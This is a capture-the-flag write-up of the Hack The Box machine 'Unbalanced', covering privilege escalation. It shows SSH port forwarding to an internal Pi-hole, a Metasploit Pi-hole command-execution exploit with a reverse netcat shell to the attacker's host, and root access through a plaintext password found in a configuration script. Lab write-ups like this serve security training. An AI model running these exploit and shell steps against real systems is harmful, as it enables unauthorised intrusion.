drwxr-xr-x 3 bryan bryan 4096 Jun 17 11:35 .
drwxr-xr-x 3 root  root  4096 Jun 17 11:35 ..
lrwxrwxrwx 1 root  root     9 Apr  3 07:07 .bash_history -> /dev/null
-rw-r--r-- 1 bryan bryan  220 Apr  2 03:14 .bash_logout
-rw-r--r-- 1 bryan bryan 3526 Apr  2 03:14 .bashrc
drwx------ 3 bryan bryan 4096 Apr  2 05:36 .gnupg
-rw-r--r-- 1 bryan bryan  807 Apr  2 03:14 .profile
-rw-r--r-- 1 bryan bryan  798 Jun 17 11:35 TODO
-rw-r--r-- 1 root  root    33 Aug 10 13:43 user.txt
bryan@unbalanced:~$ cat user.txt
6******************************a
bryan@unbalanced:~$ 


And after an exhausting work that lasted almost two days, I got the first flag. On the user's folder I found an interesting file TODO, that confirms some things discovered during my reconnaissance activity and something news!

bryan@unbalanced:~$ cat TODO 
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]


We discover that a system called pi-hole is installed and that they are still configuring it. We start another long activity to discover how to reach the escalation privileges steps.

bryan@unbalanced:~$ ss -tulwn | grep 127.0.0.1
udp     UNCONN   0        0              127.0.0.1:5553           0.0.0.0:*     
tcp     LISTEN   0        128            127.0.0.1:8080           0.0.0.0:*     
tcp     LISTEN   0        128            127.0.0.1:5553           0.0.0.0:*     


I understand that there's a service somewhere that are using some ports on this machine, but I cannot find it now. Anyway, I start to search for the exploits of this new software.

Seems that there's something I can use.

NVD - CVE-2020-8816
Pi-hole 4.3.2 Remote Code Execution ≈ Packet Storm
Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers

I move the script on the remote machine, but when I launch it...

bryan@unbalanced:/tmp/notthis$ python pihscr01.py 
Traceback (most recent call last):
  File "pihscr01.py", line 25, in <module>
    import requests
ImportError: No module named requests


...and I cannot install the missed packages. My next step so is to identify the service on the machine.

bryan@unbalanced:/tmp/notthis$ ip route
default via 10.10.10.2 dev ens160 onlink 
10.10.10.0/24 dev ens160 proto kernel scope link src 10.10.10.200 
169.254.0.0/16 dev ens160 scope link metric 1000 
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown 
172.31.0.0/16 dev br-742fc4eb92b1 proto kernel scope link src 172.31.0.1 

bryan@unbalanced:/tmp/notthis$ ip neigh 
10.10.10.2 dev ens160 lladdr 00:50:56:b9:30:b0 REACHABLE
172.31.179.2 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:02 STALE
172.31.1.3 dev br-742fc4eb92b1  FAILED
172.31.11.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:0b:03 REACHABLE
172.31.179.1 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:01 STALE
172.31.179.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:03 STALE
fe80::250:56ff:feb9:30b0 dev ens160 lladdr 00:50:56:b9:30:b0 router STALE


Seems I found something.

bryan@unbalanced:/tmp/notthis$ curl 172.31.11.3

    <html><head>
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
        <link rel='stylesheet' href='/pihole/blockingpage.css' type='text/css'/>
    </head><body id='splashpage'><img src='/admin/img/logo.svg'/><br/>Pi-<b>hole</b>: Your black hole for Internet advertisements<br><a href='/admin'>Did you mean to go to the admin panel?</a></body></html>


Yes, it's the portal. Now, I have to reach this from my machine but like local addressing. I have already made this thing in a couple of my other articles. The way is to use the ssh channel in a port forwarding; here the way.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.200 - Unbalanced (lin)/attack/script$ ssh -N -L 9999:172.31.11.3:80 bryan@10.10.10.200
bryan@10.10.10.200's password: 

### on a different shell try if it works

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.200 - Unbalanced (lin)/attack/rsync/conf_origin$ curl 127.0.0.1:9999/
[ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>


Good, it works. I try the script moved on the remote machine, but it doesn't seem to work fine. I found also different exploit in my search and one of this on metasploit-framework... I hope for it this time.

msf5 > search pihole

Matching Modules
================

   #  Name                                     Disclosure Date  Rank       Check  Description
   -  ----                                     ---------------  ----       -----  -----------
   0  exploit/unix/http/pihole_blocklist_exec  2020-05-10       excellent  Yes    Pi-Hole heisenbergCompensator Blocklist OS Command Execution
   1  exploit/unix/http/pihole_dhcp_mac_exec   2020-03-28       good       Yes    Pi-Hole DHCP MAC OS Command Execution
   2  exploit/unix/http/pihole_whitelist_exec  2018-04-15       excellent  Yes    Pi-Hole Whitelist OS Command Execution


Interact with a module by name or index, for example use 2 or use exploit/unix/http/pihole_whitelist_exec

msf5 > use exploit/unix/http/pihole_dhcp_mac_exec
[*] Using configured payload cmd/unix/reverse_netcat
msf5 exploit(unix/http/pihole_dhcp_mac_exec) > options

Module options (exploit/unix/http/pihole_dhcp_mac_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        Password for Pi-Hole interface
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the Pi-Hole Website
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set password admin
password => admin
msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set rport 9999
rport => 9999
msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set lhost 10.10.14.48
lhost => 10.10.14.48
msf5 exploit(unix/http/pihole_dhcp_mac_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.48:4444 
[*] Using cookie: PHPSESSID=m0uhl6ad7visurv26g70ckrmc6;
[*] Using token: imdyfvZYVbnaG2Aeq0aycHI/+L30b7VbPFyx995yJ4I=
[+] System env path exploitable: /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[*] Payload MAC will be: AF0D80674D05
[*] Sending Exploit
[*] Command shell session 1 opened (10.10.14.48:4444 -> 10.10.10.200:38670) at 2020-08-11 01:52:58 +0200
[*] Attempting to clean 2783D28458F6 from config
[*] Attempting to clean AF0D80674D05 from config
pwd

/var/www/html/admin


Amazing, but, something strange.

whoami
www-data
ls /root/
ph_install.sh
pihole_config.sh
ls -la /root/
total 132
drwxrwxr-x 1 root root   4096 Apr  5 20:19 .
drwxr-xr-x 1 root root   4096 Jul 30 05:13 ..
lrwxrwxrwx 1 root root      9 Apr  4 11:41 .bash_history -> /dev/null
-rw-r--r-- 1 root root    570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root    148 Aug 17  2015 .profile
-rw-r--r-- 1 root root 113876 Sep 20  2019 ph_install.sh
-rw-r--r-- 1 root root    485 Apr  6 07:28 pihole_config.sh


I'm a stupid user, but there are interesting files here, let me to read it.

cat /root/pihole_config.sh
#!/bin/bash

# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb

# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c

# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1

# Set privacy level
/usr/local/bin/pihole -a -l 4

# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'

# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb


It's really so simple? this is an administrator password? Come back on the previous ssh connection, it should be still opened.

bryan@unbalanced:/tmp/notthis$ su root
Password: 
root@unbalanced:/tmp/notthis# whoami
root
root@unbalanced:/tmp/notthis# ls -la /root
total 36
drwx------  6 root root 4096 Apr  6 06:12 .
drwxr-xr-x 18 root root 4096 Jun 17 14:08 ..
lrwxrwxrwx  1 root root    9 Apr  3 07:06 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  3 root root 4096 Apr  3 09:34 .config
drwx------  3 root root 4096 Apr  2 05:35 .gnupg
drwxr-xr-x  3 root root 4096 Apr  3 07:36 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   33 Aug 10 13:43 root.txt
drwx------  2 root root 4096 Apr  6 05:47 .ssh
root@unbalanced:/tmp/notthis# cat /root/root.txt
0******************************7
root@unbalanced:/tmp/notthis# 


And also this BOX was beaten! Enjoy my writeups, friends and have a nice day!

Amy Whitehouse by Juan Colombato.